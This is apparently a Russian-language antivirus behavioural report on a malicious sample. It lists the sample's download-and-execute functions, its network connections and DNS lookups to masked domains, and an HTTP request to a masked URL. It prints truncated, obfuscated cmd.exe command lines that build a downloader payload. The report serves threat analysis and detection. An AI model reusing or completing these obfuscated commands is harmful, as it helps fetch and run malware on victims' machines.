Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set 1WyX=PffzWWAjFwMSSVftmtmViIjsGKxL\0$'9.RU,q7:yNgu+5)lbh2vH(T3}Z8=@ CnDd;JoXcp\a-r1YkBe6{E&&for %u in (30;52;64;54;59;31;20;67;67;31;66;30;64;6...
Сетевая активность
Подключается к
- '13.##0.255.16':80
- 'ro###ashion.ro':80
- 'ro###ashion.ro':443
TCP
Запросы HTTP GET
- http://www.ro###ashion.ro/z8J0cPX
Другие
- 'ro###ashion.ro':443
UDP
- DNS ASK yo#####saatkesan.com
- DNS ASK kc.###igitize.com
- DNS ASK ap#.##ntentpress.io
- DNS ASK ro###ashion.ro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set 1WyX=PffzWWAjFwMSSVftmtmViIjsGKxL\0$'9.RU,q7:yNgu+5)lbh2vH(T3}Z8=@ CnDd;JoXcp\a-r1YkBe6{E&&for %u in (30;52;64;54;59;31;20;67;67;31;66;30;64;6...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set 1WyX=PffzWWAjFwMSSVftmtmViIjsGKxL\0$'9.RU,q7:yNgu+5)lbh2vH(T3}Z8=@ CnDd;JoXcp/a-r1YkBe6{E&&for %u in (30;52;64;54;59;31;20;67;67;31;66;30;64;6;27;59;63;80;9;74;68;48;22;80;70;17;61;4...
